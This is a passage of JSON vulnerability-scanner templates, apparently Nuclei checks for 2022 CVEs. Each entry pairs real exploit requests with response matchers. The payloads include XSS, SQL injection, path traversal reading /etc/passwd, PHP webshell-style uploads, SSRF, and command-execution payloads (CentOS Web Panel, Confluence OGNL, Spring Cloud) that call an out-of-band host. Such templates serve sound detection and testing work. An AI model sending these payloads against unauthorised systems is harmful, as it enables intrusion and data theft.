7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31983","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"regex","regex":["^1331' and sleep\\(5\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-3982\"); ?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST 